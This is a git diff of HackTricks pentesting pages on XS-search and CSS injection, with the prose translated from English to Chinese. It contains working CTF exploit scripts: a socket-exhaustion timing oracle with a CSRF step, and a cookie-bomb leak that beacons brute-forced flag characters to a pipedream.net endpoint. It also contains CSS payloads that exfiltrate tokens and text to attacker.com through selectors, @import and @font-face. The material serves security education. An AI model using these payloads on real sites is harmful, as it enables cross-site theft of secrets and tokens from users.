+const time_fetch = async () => {
+let test_server_url = `https://${MYSERVER}/?${LOG}`
+let start = window.performance.now()
+try {
+await fetch(test_server_url, {
+mode: "no-cors",
+})
+} catch (e) {
+console.log(e)
+}
+let end = window.performance.now()
+return end - start
+}
 
-  const fetch_sleep_long = (i) => {
-    // 40s sleep
-    return fetch(`https://${i}.${MYSERVER}/40sleep`, {
-      mode: "no-cors",
-    })
-  }
+const fetch_sleep_long = (i) => {
+// 40s sleep
+return fetch(`https://${i}.${MYSERVER}/40sleep`, {
+mode: "no-cors",
+})
+}
 
-  const fetch_sleep_short = (i) => {
-    // 0.25s sleep
-    return fetch(`https://${i}.${MYSERVER}/ssleep`, {
-      mode: "no-cors",
-    })
-  }
+const fetch_sleep_short = (i) => {
+// 0.25s sleep
+return fetch(`https://${i}.${MYSERVER}/ssleep`, {
+mode: "no-cors",
+})
+}
 
-  const block_socket = async (i) => {
-    fetch_sleep_long(i)
-    // needed?
-    await sleep(0)
-  }
+const block_socket = async (i) => {
+fetch_sleep_long(i)
+// needed?
+await sleep(0)
+}
 
-  const exhaust_sockets = async () => {
-    let i = 0
-    for (; i < SOCKETLIMIT; i++) {
-      block_socket(i)
-    }
-    console.log(`Used ${i} connections`)
-  }
+const exhaust_sockets = async () => {
+let i = 0
+for (; i < SOCKETLIMIT; i++) {
+block_socket(i)
+}
+console.log(`Used ${i} connections`)
+}
 
-  const timeit = async (url, popup) => {
-    return new Promise(async (r) => {
-      popup.location = url
-      // needed?
-      await sleep(50)
+const timeit = async (url, popup) => {
+return new Promise(async (r) => {
+popup.location = url
+// needed?
+await sleep(50)
 
-      let val = await time_fetch()
-      r(val)
-    })
-  }
+let val = await time_fetch()
+r(val)
+})
+}
 
-  // const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
-  const alphabet = "abcdefghijklmnopqrstuvwxyz}_".split("")
-  // const alphabet = 'abcdef}'.split('');
+// const alphabet = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-}!"#$%&\'()*+,-./:;<=>?@[\\]^`|~{'.split('');
+const alphabet = "abcdefghijklmnopqrstuvwxyz}_".split("")
+// const alphabet = 'abcdef}'.split('');
 
-  const oracle = async (search) => {
-    let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
-    let t = await timeit(url, WINBG)
+const oracle = async (search) => {
+let url = `https://carrot-${INSTANCE}.mc.ax/tasks?search=${search}`
+let t = await timeit(url, WINBG)
 
-    LOG = `${search}:${t}`
-    console.log(`${search}:${t}`)
+LOG = `${search}:${t}`
+console.log(`${search}:${t}`)
 
-    return t > TIMELIMIT
-  }
+return t > TIMELIMIT
+}
 
-  const brute = async (flag) => {
-    for (const char of alphabet) {
-      if (await oracle(flag + char)) {
-        return char
-      }
-    }
-    return false
-  }
+const brute = async (flag) => {
+for (const char of alphabet) {
+if (await oracle(flag + char)) {
+return char
+}
+}
+return false
+}
 
-  const calibrate = async () => {
-    return new Promise(async (r) => {
-      // slow
-      let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
-      let t1 = await timeit(url1, WINBG)
-      console.log(`slow:${t1}`)
-      // fast
-      let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
-      let t2 = await timeit(url2, WINBG)
-      console.log(`fast:${t2}`)
-      return r((t1 + t2) / 2)
-    })
-  }
+const calibrate = async () => {
+return new Promise(async (r) => {
+// slow
+let url1 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=dice{`
+let t1 = await timeit(url1, WINBG)
+console.log(`slow:${t1}`)
+// fast
+let url2 = `https://carrot-${INSTANCE}.mc.ax/tasks?search=XXXXXXXXXX`
+let t2 = await timeit(url2, WINBG)
+console.log(`fast:${t2}`)
+return r((t1 + t2) / 2)
+})
+}
 
-  const exploit = async (flag = "") => {
-    console.log("Starting")
-    // dont go to fast plz :)
-    console.log(`waiting 3s`)
-    await sleep(3000)
-    // exaust sockets
-    await exhaust_sockets()
-    await sleep(2000)
-    LOG = `Calibrating`
-    TIMELIMIT = await calibrate()
-    LOG = `TIMELIMIT:${TIMELIMIT}`
-    console.log(`timelimit:${TIMELIMIT}`)
-    await sleep(2000)
-    let last
-    while (true) {
-      last = await brute(flag)
-      if (last === false) {
-        return flag
-      } else {
-        flag += last
-        output.innerText = flag
-        if (last === "}") {
-          return flag
-        }
-      }
-    }
-  }
+const exploit = async (flag = "") => {
+console.log("Starting")
+// dont go to fast plz :)
+console.log(`waiting 3s`)
+await sleep(3000)
+// exaust sockets
+await exhaust_sockets()
+await sleep(2000)
+LOG = `Calibrating`
+TIMELIMIT = await calibrate()
+LOG = `TIMELIMIT:${TIMELIMIT}`
+console.log(`timelimit:${TIMELIMIT}`)
+await sleep(2000)
+let last
+while (true) {
+last = await brute(flag)
+if (last === false) {
+return flag
+} else {
+flag += last
+output.innerText = flag
+if (last === "}") {
+return flag
+}
+}
+}
+}
 
-  const popunder = () => {
-    if (window.opener) {
-      WINBG = window.opener
-    } else {
-      WINBG = window.open(location.href, (target = "_blank"))
-      location = `about:blank`
-    }
-  }
+const popunder = () => {
+if (window.opener) {
+WINBG = window.opener
+} else {
+WINBG = window.open(location.href, (target = "_blank"))
+location = `about:blank`
+}
+}
 
-  const csrf = async () => {
-    x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
-    x.title.value = "A".repeat(1000000)
-    x.submit()
-  }
+const csrf = async () => {
+x.action = `https://carrot-${INSTANCE}.mc.ax/edit/0`
+x.title.value = "A".repeat(1000000)
+x.submit()
+}
 
-  window.onload = () => {
-    let p = new URL(location).searchParams
-    if (!p.has("i")) {
-      console.log(`no INSTANCE`)
-      return
-    }
-    INSTANCE = p.get("i")
-    // step 1
-    if (p.has("csrf")) {
-      csrf()
-      return
-    }
-    // step 2
-    if (p.has("exploit")) {
-      // window open is ok in headless :)
-      popunder()
+window.onload = () => {
+let p = new URL(location).searchParams
+if (!p.has("i")) {
+console.log(`no INSTANCE`)
+return
+}
+INSTANCE = p.get("i")
+// step 1
+if (p.has("csrf")) {
+csrf()
+return
+}
+// step 2
+if (p.has("exploit")) {
+// window open is ok in headless :)
+popunder()
 
-      exploit("dice{")
-    }
-  }
+exploit("dice{")
+}
+}
 </script>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
index 58eaf2547..734ccfbc9 100644
--- a/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
+++ b/src/pentesting-web/xs-search/cookie-bomb-+-onerror-xs-leak.md
@@ -2,62 +2,59 @@
 
 {{#include ../../banners/hacktricks-training.md}}
 
-The following **script** taken from [**here**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/) is exploiting a functionality that allows the user to **insert any amount of cookies**, and then loading a file as a script knowing that the true response will be larger than the false one and then. If successful, the response is a redirect with a resulting URL longer, **too large to handle by the server so return an error http status code**. If the search fails, nothing will happen because URL is short.
-
+以下**脚本**来自[**这里**](https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/)，利用了一种功能，允许用户**插入任意数量的 cookies**，然后加载一个文件作为脚本，知道真实响应将大于虚假响应。如果成功，响应将是一个重定向， resulting URL 更长，**服务器无法处理的太大，因此返回一个错误的 http 状态码**。如果搜索失败，则不会发生任何事情，因为 URL 很短。
 ```html
 <>'";
 <form action="https://sustenance.web.actf.co/s" method="POST">
-  <input id="f" /><input name="search" value="a" />
+<input id="f" /><input name="search" value="a" />
 </form>
 <script>
-  const $ = document.querySelector.bind(document)
-  const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
-  let i = 0
-  const stuff = async (len = 3500) => {
-    let name = Math.random()
-    $("form").target = name
-    let w = window.open("", name)
-    $("#f").value = "_".repeat(len)
-    $("#f").name = i++
-    $("form").submit()
-    await sleep(100)
-  }
-  const isError = async (url) => {
-    return new Promise((r) => {
-      let script = document.createElement("script")
-      script.src = url
-      script.onload = () => r(false)
-      script.onerror = () => r(true)
-      document.head.appendChild(script)
-    })
-  }
-  const search = (query) => {
-    return isError(
-      "https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
-    )
-  }
-  const alphabet =
-    "etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
-  const url = "//en4u1nbmyeahu.x.pipedream.net/"
-  let known = "actf{"
-  window.onload = async () => {
-    navigator.sendBeacon(url + "?load")
-    await Promise.all([stuff(), stuff(), stuff(), stuff()])
-    await stuff(1600)
-    navigator.sendBeacon(url + "?go")
-    while (true) {
-      for (let c of alphabet) {
-        let query = known + c
-        if (await search(query)) {
-          navigator.sendBeacon(url, query)
-          known += c
-          break
-        }
-      }
-    }
-  }
+const $ = document.querySelector.bind(document)
+const sleep = (ms) => new Promise((r) => setTimeout(r, ms))
+let i = 0
+const stuff = async (len = 3500) => {
+let name = Math.random()
+$("form").target = name
+let w = window.open("", name)
+$("#f").value = "_".repeat(len)
+$("#f").name = i++
+$("form").submit()
+await sleep(100)
+}
+const isError = async (url) => {
+return new Promise((r) => {
+let script = document.createElement("script")
+script.src = url
+script.onload = () => r(false)
+script.onerror = () => r(true)
+document.head.appendChild(script)
+})
+}
+const search = (query) => {
+return isError(
+"https://sustenance.web.actf.co/q?q=" + encodeURIComponent(query)
+)
+}
+const alphabet =
+"etoanihsrdluc_01234567890gwyfmpbkvjxqz{}ETOANIHSRDLUCGWYFMPBKVJXQZ"
+const url = "//en4u1nbmyeahu.x.pipedream.net/"
+let known = "actf{"
+window.onload = async () => {
+navigator.sendBeacon(url + "?load")
+await Promise.all([stuff(), stuff(), stuff(), stuff()])
+await stuff(1600)
+navigator.sendBeacon(url + "?go")
+while (true) {
+for (let c of alphabet) {
+let query = known + c
+if (await search(query)) {
+navigator.sendBeacon(url, query)
+known += c
+break
+}
+}
+}
+}
 </script>
 ```
-
 {{#include ../../banners/hacktricks-training.md}}
-
diff --git a/src/pentesting-web/xs-search/css-injection/README.md b/src/pentesting-web/xs-search/css-injection/README.md
index aae3b5c92..a2a626e56 100644
--- a/src/pentesting-web/xs-search/css-injection/README.md
+++ b/src/pentesting-web/xs-search/css-injection/README.md
@@ -1,282 +1,266 @@
-# CSS Injection
+# CSS 注入
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## CSS Injection
+## CSS 注入
 
-### Attribute Selector
-
-CSS selectors are crafted to match values of an `input` element's `name` and `value` attributes. If the input element's value attribute starts with a specific character, a predefined external resource is loaded:
+### 属性选择器
 
+CSS 选择器被设计用来匹配 `input` 元素的 `name` 和 `value` 属性的值。如果输入元素的值属性以特定字符开头，则加载预定义的外部资源：
 ```css
 input[name="csrf"][value^="a"] {
-  background-image: url(https://attacker.com/exfil/a);
+background-image: url(https://attacker.com/exfil/a);
 }
 input[name="csrf"][value^="b"] {
-  background-image: url(https://attacker.com/exfil/b);
+background-image: url(https://attacker.com/exfil/b);
 }
 /* ... */
 input[name="csrf"][value^="9"] {
-  background-image: url(https://attacker.com/exfil/9);
+background-image: url(https://attacker.com/exfil/9);
 }
 ```
+然而，这种方法在处理隐藏输入元素（`type="hidden"`）时面临限制，因为隐藏元素不加载背景。
 
-However, this approach faces a limitation when dealing with hidden input elements (`type="hidden"`) because hidden elements do not load backgrounds.
-
-#### Bypass for Hidden Elements
-
-To circumvent this limitation, you can target a subsequent sibling element using the `~` general sibling combinator. The CSS rule then applies to all siblings following the hidden input element, causing the background image to load:
+#### 绕过隐藏元素的限制
 
+为了绕过这个限制，您可以使用 `~` 一般兄弟组合器来定位后续兄弟元素。然后，CSS 规则适用于所有在隐藏输入元素之后的兄弟元素，从而导致背景图像加载：
 ```css
 input[name="csrf"][value^="csrF"] ~ * {
-  background-image: url(https://attacker.com/exfil/csrF);
+background-image: url(https://attacker.com/exfil/csrF);
 }
 ```
+一个利用此技术的实际示例在提供的代码片段中详细说明。您可以在 [这里](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e) 查看。
 
-A practical example of exploiting this technique is detailed in the provided code snippet. You can view it [here](https://gist.github.com/d0nutptr/928301bde1d2aa761d1632628ee8f24e).
+#### CSS 注入的先决条件
 
-#### Prerequisites for CSS Injection
+为了使 CSS 注入技术有效，必须满足某些条件：
 
-For the CSS Injection technique to be effective, certain conditions must be met:
+1. **有效负载长度**：CSS 注入向量必须支持足够长的有效负载，以容纳精心制作的选择器。
+2. **CSS 重新评估**：您应该能够框架页面，这对于触发使用新生成的有效负载重新评估 CSS 是必要的。
+3. **外部资源**：该技术假设能够使用外部托管的图像。这可能会受到网站内容安全策略 (CSP) 的限制。
 
-1. **Payload Length**: The CSS injection vector must support sufficiently long payloads to accommodate the crafted selectors.
-2. **CSS Re-evaluation**: You should have the ability to frame the page, which is necessary to trigger the re-evaluation of CSS with newly generated payloads.
-3. **External Resources**: The technique assumes the ability to use externally hosted images. This might be restricted by the site's Content Security Policy (CSP).
-
-### Blind Attribute Selector
-
-As [**explained in this post**](https://portswigger.net/research/blind-css-exfiltration), it's possible to combine the selectors **`:has`** and **`:not`** to identify content even from blind elements. This is very useful when you have no idea what is inside the web page loading the CSS injection.\
-It's also possible to use those selectors to extract information from several block of the same type like in:
+### 盲属性选择器
 
+正如 [**在这篇文章中解释的**](https://portswigger.net/research/blind-css-exfiltration)，可以结合选择器 **`:has`** 和 **`:not`** 来识别来自盲元素的内容。这在您不知道加载 CSS 注入的网页内部内容时非常有用。\
+还可以使用这些选择器从多个相同类型的块中提取信息，例如：
 ```html
 <style>
-  html:has(input[name^="m"]):not(input[name="mytoken"]) {
-    background: url(/m);
-  }
+html:has(input[name^="m"]):not(input[name="mytoken"]) {
+background: url(/m);
+}
 </style>
 <input name="mytoken" value="1337" />
 <input name="myname" value="gareth" />
 ```
-
-Combining this with the following **@import** technique, it's possible to exfiltrate a lot of **info using CSS injection from blind pages with** [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**.**
+结合以下的 **@import** 技术，可以从盲页面中通过 **CSS 注入泄露大量信息**，使用 [**blind-css-exfiltration**](https://github.com/hackvertor/blind-css-exfiltration)**。**
 
 ### @import
 
-The previous technique has some drawbacks, check the prerequisites. You either need to be able to **send multiple links to the victim**, or you need to be able to **iframe the CSS injection vulnerable page**.
+之前的技术有一些缺点，请检查先决条件。你要么需要能够 **向受害者发送多个链接**，要么需要能够 **iframe CSS 注入漏洞页面**。
 
-However, there is another clever technique that uses **CSS `@import`** to improve the quality of the technique.
+然而，还有另一种巧妙的技术，使用 **CSS `@import`** 来提高技术的质量。
 
-This was first showed by [**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf) and it works like this:
-
-Instead of loading the same page once and again with tens of different payloads each time (like in the previous one), we are going to **load the page just once and just with an import to the attackers server** (this is the payload to send to the victim):
+这首先由 [**Pepe Vila**](https://vwzq.net/slides/2019-s3_css_injection_attacks.pdf) 展示，工作原理如下：
 
+我们将不再一次又一次地加载同一页面，每次使用数十个不同的有效载荷（如前面所述），而是 **只加载页面一次，并仅通过导入到攻击者的服务器**（这是发送给受害者的有效载荷）：
 ```css
 @import url("//attacker.com:5001/start?");
 ```
+1. 导入将会**接收一些来自攻击者的CSS脚本**，并且**浏览器将加载它**。
+2. 攻击者发送的CSS脚本的第一部分是**另一个`@import`到攻击者的服务器**。
+1. 攻击者的服务器不会立即响应这个请求，因为我们想要泄露一些字符，然后用有效负载响应这个导入以泄露下一个字符。
+3. 有效负载的第二部分和更大部分将是一个**属性选择器泄露有效负载**。
+1. 这将向攻击者的服务器发送**秘密的第一个字符和最后一个字符**。
+4. 一旦攻击者的服务器接收到**秘密的第一个和最后一个字符**，它将**响应步骤2中请求的导入**。
+1. 响应将与**步骤2、3和4完全相同**，但这次它将尝试**找到秘密的第二个字符和倒数第二个字符**。
 
-1. The import is going to **receive some CSS script** from the attackers and the **browser will load it**.
-2. The first part of the CSS script the attacker will send is **another `@import` to the attackers server again.**
-   1. The attackers server won't respond this request yet, as we want to leak some chars and then respond this import with the payload to leak the next ones.
-3. The second and bigger part of the payload is going to be an **attribute selector leakage payload**
-   1. This will send to the attackers server the **first char of the secret and the last one**
-4. Once the attackers server has received the **first and last char of the secret**, it will **respond the import requested in the step 2**.
-   1. The response is going to be exactly the same as the **steps 2, 3 and 4**, but this time it will try to **find the second char of the secret and then penultimate**.
+攻击者将**遵循这个循环，直到完全泄露秘密**。
 
-The attacker will f**ollow that loop until it manages to leak completely the secret**.
-
-You can find the original [**Pepe Vila's code to exploit this here**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231) or you can find almost the [**same code but commented here**.](./#css-injection)
+您可以在这里找到原始的[**Pepe Vila的代码来利用这个**](https://gist.github.com/cgvwzq/6260f0f0a47c009c87b4d46ce3808231)，或者您可以在这里找到几乎[**相同的代码但有注释**](./#css-injection)。
 
 > [!NOTE]
-> The script will try to discover 2 chars each time (from the beginning and from the end) because the attribute selector allows to do things like:
+> 该脚本将尝试每次发现2个字符（从开头和结尾），因为属性选择器允许做如下事情：
 >
 > ```css
-> /* value^=  to match the beggining of the value*/
+> /* value^=  匹配值的开头*/
 > input[value^="0"] {
 >   --s0: url(http://localhost:5001/leak?pre=0);
 > }
 >
-> /* value$=  to match the ending of the value*/
+> /* value$=  匹配值的结尾*/
 > input[value$="f"] {
 >   --e0: url(http://localhost:5001/leak?post=f);
 > }
 > ```
 >
-> This allows the script to leak the secret faster.
+> 这使得脚本能够更快地泄露秘密。
 
 > [!WARNING]
-> Sometimes the script **doesn't detect correctly that the prefix + suffix discovered is already the complete flag** and it will continue forwards (in the prefix) and backwards (in the suffix) and at some point it will hang.\
-> No worries, just check the **output** because **you can see the flag there**.
+> 有时脚本**无法正确检测到前缀+后缀已发现是完整的标志**，它将继续向前（在前缀中）和向后（在后缀中），并在某个时刻会挂起。\
+> 不用担心，只需检查**输出**，因为**您可以在那里看到标志**。
 
-### Other selectors
+### 其他选择器
 
-Other ways to access DOM parts with **CSS selectors**:
+使用**CSS选择器**访问DOM部分的其他方法：
 
-- **`.class-to-search:nth-child(2)`**: This will search the second item with class "class-to-search" in the DOM.
-- **`:empty`** selector: Used for example in [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
-
-  ```css
-  [role^="img"][aria-label="1"]:empty {
-    background-image: url("YOUR_SERVER_URL?1");
-  }
-  ```
-
-### Error based XS-Search
-
-**Reference:** [CSS based Attack: Abusing unicode-range of @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
-
-The overall intention is to **use a custom font from a controlled endpoint** and ensure that **text (in this case, 'A') is displayed with this font only if the specified resource (`favicon.ico`) cannot be loaded**.
-
-```html
-<!DOCTYPE html>
-<html>
-  <head>
-    <style>
-      @font-face {
-        font-family: poc;
-        src: url(http://attacker.com/?leak);
-        unicode-range: U+0041;
-      }
-
-      #poc0 {
-        font-family: "poc";
-      }
-    </style>
-  </head>
-  <body>
-    <object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
-  </body>
-</html>
-```
-
-1. **Custom Font Usage**:
-
-   - A custom font is defined using the `@font-face` rule within a `<style>` tag in the `<head>` section.
-   - The font is named `poc` and is fetched from an external endpoint (`http://attacker.com/?leak`).
-   - The `unicode-range` property is set to `U+0041`, targeting the specific Unicode character 'A'.
-
-2. **Object Element with Fallback Text**:
-   - An `<object>` element with `id="poc0"` is created in the `<body>` section. This element tries to load a resource from `http://192.168.0.1/favicon.ico`.
-   - The `font-family` for this element is set to `'poc'`, as defined in the `<style>` section.
-   - If the resource (`favicon.ico`) fails to load, the fallback content (the letter 'A') inside the `<object>` tag is displayed.
-   - The fallback content ('A') will be rendered using the custom font `poc` if the external resource cannot be loaded.
-
-### Styling Scroll-to-Text Fragment
-
-The **`:target`** pseudo-class is employed to select an element targeted by a **URL fragment**, as specified in the [CSS Selectors Level 4 specification](https://drafts.csswg.org/selectors-4/#the-target-pseudo). It's crucial to understand that `::target-text` doesn't match any elements unless the text is explicitly targeted by the fragment.
-
-A security concern arises when attackers exploit the **Scroll-to-text** fragment feature, allowing them to confirm the presence of specific text on a webpage by loading a resource from their server through HTML injection. The method involves injecting a CSS rule like this:
+- **`.class-to-search:nth-child(2)`**：这将搜索DOM中类为"class-to-search"的第二个项目。
+- **`:empty`**选择器：例如在[**这篇文章**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**中使用：**
 
 ```css
-:target::before {
-  content: url(target.png);
+[role^="img"][aria-label="1"]:empty {
+background-image: url("YOUR_SERVER_URL?1");
 }
 ```
 
-In such scenarios, if the text "Administrator" is present on the page, the resource `target.png` gets requested from the server, indicating the text's presence. An instance of this attack can be executed through a specially crafted URL that embeds the injected CSS alongside a Scroll-to-text fragment:
+### 基于错误的XS-Search
 
+**参考：** [基于CSS的攻击：滥用@font-face的unicode-range](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html)，[基于错误的XS-Search PoC由@terjanq提供](https://twitter.com/terjanq/status/1180477124861407234)
+
+总体意图是**使用来自受控端点的自定义字体**，并确保**文本（在这种情况下为'A'）仅在指定资源（`favicon.ico`）无法加载时使用此字体显示**。
+```html
+<!DOCTYPE html>
+<html>
+<head>
+<style>
+@font-face {
+font-family: poc;
+src: url(http://attacker.com/?leak);
+unicode-range: U+0041;
+}
+
+#poc0 {
+font-family: "poc";
+}
+</style>
+</head>
+<body>
+<object id="poc0" data="http://192.168.0.1/favicon.ico">A</object>
+</body>
+</html>
+```
+1. **自定义字体使用**：
+
+- 自定义字体通过在`<head>`部分的`<style>`标签中使用`@font-face`规则定义。
+- 字体命名为`poc`，并从外部端点获取（`http://attacker.com/?leak`）。
+- `unicode-range`属性设置为`U+0041`，目标是特定的Unicode字符'A'。
+
+2. **带回退文本的对象元素**：
+- 在`<body>`部分创建一个`<object>`元素，`id="poc0"`。该元素尝试从`http://192.168.0.1/favicon.ico`加载资源。
+- 此元素的`font-family`设置为`'poc'`，如在`<style>`部分定义。
+- 如果资源（`favicon.ico`）加载失败，则在`<object>`标签内显示回退内容（字母'A'）。
+- 如果无法加载外部资源，回退内容（'A'）将使用自定义字体`poc`呈现。
+
+### 样式滚动到文本片段
+
+**`:target`**伪类用于选择由**URL片段**指定的目标元素，如在[CSS选择器第4级规范](https://drafts.csswg.org/selectors-4/#the-target-pseudo)中所述。重要的是要理解，`::target-text`不会匹配任何元素，除非文本被片段明确目标。
+
+当攻击者利用**滚动到文本**片段功能时，会出现安全隐患，这使他们能够通过HTML注入从其服务器加载资源，以确认网页上特定文本的存在。该方法涉及注入如下的CSS规则：
+```css
+:target::before {
+content: url(target.png);
+}
+```
+在这种情况下，如果页面上存在文本“Administrator”，则会从服务器请求资源 `target.png`，这表明该文本的存在。此攻击的一个实例可以通过一个特殊构造的 URL 执行，该 URL 嵌入了注入的 CSS 以及一个 Scroll-to-text 片段：
 ```
 http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
 ```
+这里，攻击利用 HTML 注入来传输 CSS 代码，针对特定文本 "Administrator" 通过 Scroll-to-text fragment (`#:~:text=Administrator`)。如果找到该文本，指示的资源将被加载，无意中向攻击者发出其存在的信号。
 
-Here, the attack manipulates HTML injection to transmit the CSS code, aiming at the specific text "Administrator" through the Scroll-to-text fragment (`#:~:text=Administrator`). If the text is found, the indicated resource is loaded, inadvertently signaling its presence to the attacker.
+为了缓解，以下几点应注意：
 
-For mitigation, the following points should be noted:
+1. **受限的 STTF 匹配**：Scroll-to-text Fragment (STTF) 仅设计用于匹配单词或句子，从而限制其泄露任意秘密或令牌的能力。
+2. **限制在顶级浏览上下文中**：STTF 仅在顶级浏览上下文中操作，不在 iframe 内工作，使得任何利用尝试对用户来说更为明显。
+3. **用户激活的必要性**：STTF 需要用户激活手势才能操作，这意味着利用仅通过用户发起的导航才可行。这一要求大大降低了攻击在没有用户交互的情况下自动化的风险。然而，博客作者指出了特定条件和绕过方法（例如，社会工程学，与流行浏览器扩展的交互）可能会简化攻击的自动化。
 
-1. **Constrained STTF Matching**: Scroll-to-text Fragment (STTF) is designed to match only words or sentences, thereby limiting its capability to leak arbitrary secrets or tokens.
-2. **Restriction to Top-level Browsing Contexts**: STTF operates solely in top-level browsing contexts and does not function within iframes, making any exploitation attempt more noticeable to the user.
-3. **Necessity of User Activation**: STTF requires a user-activation gesture to operate, meaning exploitations are feasible only through user-initiated navigations. This requirement considerably mitigates the risk of attacks being automated without user interaction. Nevertheless, the blog post's author points out specific conditions and bypasses (e.g., social engineering, interaction with prevalent browser extensions) that might ease the attack's automation.
+了解这些机制和潜在漏洞对于维护网络安全和防范此类利用策略至关重要。
 
-Awareness of these mechanisms and potential vulnerabilities is key for maintaining web security and safeguarding against such exploitative tactics.
+有关更多信息，请查看原始报告：[https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
 
-For more information check the original report: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
-
-You can check an [**exploit using this technique for a CTF here**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
+您可以在这里查看一个 [**使用此技术的 CTF 漏洞**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb)。
 
 ### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
 
-You can specify **external fonts for specific unicode values** that will only be **gathered if those unicode values are present** in the page. For example:
-
+您可以为特定的 unicode 值指定 **外部字体**，这些字体 **仅在页面中存在这些 unicode 值时** 被 **收集**。例如：
 ```html
 <style>
-  @font-face {
-    font-family: poc;
-    src: url(http://attacker.example.com/?A); /* fetched */
-    unicode-range: U+0041;
-  }
-  @font-face {
-    font-family: poc;
-    src: url(http://attacker.example.com/?B); /* fetched too */
-    unicode-range: U+0042;
-  }
-  @font-face {
-    font-family: poc;
-    src: url(http://attacker.example.com/?C); /* not fetched */
-    unicode-range: U+0043;
-  }
-  #sensitive-information {
-    font-family: poc;
-  }
+@font-face {
+font-family: poc;
+src: url(http://attacker.example.com/?A); /* fetched */
+unicode-range: U+0041;
+}
+@font-face {
+font-family: poc;
+src: url(http://attacker.example.com/?B); /* fetched too */
+unicode-range: U+0042;
+}
+@font-face {
+font-family: poc;
+src: url(http://attacker.example.com/?C); /* not fetched */
+unicode-range: U+0043;
+}
+#sensitive-information {
+font-family: poc;
+}
 </style>
 
 <p id="sensitive-information">AB</p>
 htm
 ```
+当您访问此页面时，Chrome 和 Firefox 会获取 "?A" 和 "?B"，因为敏感信息的文本节点包含 "A" 和 "B" 字符。但 Chrome 和 Firefox 不会获取 "?C"，因为它不包含 "C"。这意味着我们能够读取 "A" 和 "B"。
 
-When you access this page, Chrome and Firefox fetch "?A" and "?B" because text node of sensitive-information contains "A" and "B" characters. But Chrome and Firefox do not fetch "?C" because it does not contain "C". This means that we have been able to read "A" and "B".
+### 文本节点外泄 (I)：连字 <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
 
-### Text node exfiltration (I): ligatures <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
+**参考：** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
 
-**Reference:** [Wykradanie danych w świetnym stylu – czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
+所描述的技术涉及通过利用字体连字并监控宽度变化来提取节点中的文本。该过程包括几个步骤：
 
-The technique described involves extracting text from a node by exploiting font ligatures and monitoring changes in width. The process involves several steps:
+1. **自定义字体的创建**：
 
-1. **Creation of Custom Fonts**:
+- SVG 字体是用具有 `horiz-adv-x` 属性的字形制作的，该属性为表示两个字符序列的字形设置了较大的宽度。
+- 示例 SVG 字形：`<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`，其中 "XY" 表示一个两个字符的序列。
+- 然后使用 fontforge 将这些字体转换为 woff 格式。
 
-   - SVG fonts are crafted with glyphs having a `horiz-adv-x` attribute, which sets a large width for a glyph representing a two-character sequence.
-   - Example SVG glyph: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, where "XY" denotes a two-character sequence.
-   - These fonts are then converted to woff format using fontforge.
+2. **宽度变化的检测**：
 
-2. **Detection of Width Changes**:
+- 使用 CSS 确保文本不换行（`white-space: nowrap`）并自定义滚动条样式。
+- 水平滚动条的出现，样式明显，作为指示器（oracle），表明文本中存在特定的连字，因此存在特定的字符序列。
+- 涉及的 CSS：
+```css
+body {
+white-space: nowrap;
+}
+body::-webkit-scrollbar {
+background: blue;
+}
+body::-webkit-scrollbar:horizontal {
+background: url(http://attacker.com/?leak);
+}
+```
 
